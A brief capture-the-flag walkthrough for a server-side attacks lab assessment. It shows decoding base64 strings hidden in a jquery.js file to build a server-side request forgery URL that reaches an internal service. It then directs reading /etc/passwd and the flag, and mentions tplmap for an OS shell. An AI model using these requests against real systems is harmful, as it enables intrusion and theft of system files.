Server Side Attacks

Skills Assessment

tplmap.py can be used to get os-shell easily but not for this case

Go to view-source:http://104.248.160.230:30947/static/jquery.js

Using Decodify tool,

decode the base64 values of var x,y,z

./dcode Ly86cHR0aA== > http://

./dcode dHNvaC5ub2l0YWNvbC53b2RuaXc= > window.location.host

./dcode dHh0LmVnYXNzZW0vMDgwODoxLjAuMC43MjEvLzpwdHRoPXQzM2w/M000M2wxRnQ0aFR0M0cv > =/G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt

Go to http://165.232.98.156:31779/G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt

Try to read /etc/passwd

Read flag

Last updated 3 months ago